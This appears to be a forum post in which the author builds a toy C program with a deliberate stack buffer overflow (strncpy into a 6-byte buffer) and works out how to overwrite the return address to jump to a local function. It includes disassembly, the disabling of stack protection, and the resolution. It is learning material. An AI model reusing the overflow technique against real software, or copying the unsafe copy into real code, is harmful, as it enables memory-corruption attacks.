Hi I’m trying to write an overflow exploit for a simple program that I’ve built. Bellow is the C program that I’ve written.
#include <unistd.h>
#include <string.h>
#include <stdio.h>
char *string_in = "Did not work";
int test(char *this){
char sum_buf[6];
strncpy(sum_buf,this,24);
return 0;
}
void hello(){
printf("hello man");
string_in = "If this triggered, it means our shell code is working\n";
return;
}
int main(int argc, void **argv){
test("01234567890123456789\x00\x40\x06\x02");
printf("My string is %s",string_in);
return 0;
}
Basically what happens is that the string is suppose to be read in an overwrite EBP with the value of 0x00400602, which is the return address of my function hello(). I know that this is the value of the address for my function hello since objdump -d test_stack.o. From the object dump, I can tell that rsp has been advanced 20 bytes as shown bellow
00000000004005b4 <test>:
4005b4: 55 push %rbp
4005b5: 48 89 e5 mov %rsp,%rbp
4005b8: 48 83 ec 20 sub $0x20,%rsp
4005bc: 48 89 7d e8 mov %rdi,-0x18(%rbp)
4005c0: 64 48 8b 04 25 28 00 mov %fs:0x28,%rax
4005c7: 00 00
4005c9: 48 89 45 f8 mov %rax,-0x8(%rbp)
4005cd: 31 c0 xor %eax,%eax
4005cf: 48 8b 4d e8 mov -0x18(%rbp),%rcx
4005d3: 48 8d 45 f0 lea -0x10(%rbp),%rax
4005d7: ba 18 00 00 00 mov $0x18,%edx
4005dc: 48 89 ce mov %rcx,%rsi
4005df: 48 89 c7 mov %rax,%rdi
4005e2: e8 a9 fe ff ff callq 400490 <strncpy@plt>
4005e7: b8 00 00 00 00 mov $0x0,%eax
4005ec: 48 8b 55 f8 mov -0x8(%rbp),%rdx
4005f0: 64 48 33 14 25 28 00 xor %fs:0x28,%rdx
4005f7: 00 00
4005f9: 74 05 je 400600 <test+0x4c>
4005fb: e8 a0 fe ff ff callq 4004a0 <__stack_chk_fail@plt>
400600: c9 leaveq
400601: c3 retq
0000000000400602 <hello>:
400602: 55 push %rbp
400603: 48 89 e5 mov %rsp,%rbp
400606: b8 6d 07 40 00 mov $0x40076d,%eax
40060b: 48 89 c7 mov %rax,%rdi
40060e: b8 00 00 00 00 mov $0x0,%eax
400613: e8 98 fe ff ff callq 4004b0 <printf@plt>
400618: 48 c7 05 0d 0a 20 00 movq $0x400778,0x200a0d(%rip) #
Since sub $20,%rsp I know that I need to write atleast 20 bytes … but I’m not sure how much more I need to write to get to my rbp. Its possible that from my calq’s, I need to write 8 or my bytes since there are 2 x calls. Though I’m really not sure how much I need to write.
I compile my program like so …
gcc -g stack.c -o test_stack.o
execstack -s test_stack.o
Since I’m using ubuntu 11, my kernel version is like 3.0.17 so I know that my aslr is on by default. I may need to turn that off, but I don’t know how to do that. Also I’m running a i386:x86_64. Can I tell what my stack actually looks like during a run? How can I get this to work and how do I find how much I need to write?
Thanks for the help
Well the first problem was that I had to turn off stack protect with the -fno-stack-protector flag on. Once I did that it became much easier to overwrite my buffer. The second problem was that even if the string was read and stored with little endian, the opcode and operand seemed to be interpreted with big endian. I don’t understand why this is the case. Lastly, it wasn’t the EBP stack frame that I was interested in overwritting … it was the return address of my function. This meant that instead of writing 24 bytes, I needed to effectively overwrite a whopping 32 bytes. I finally got the program to work!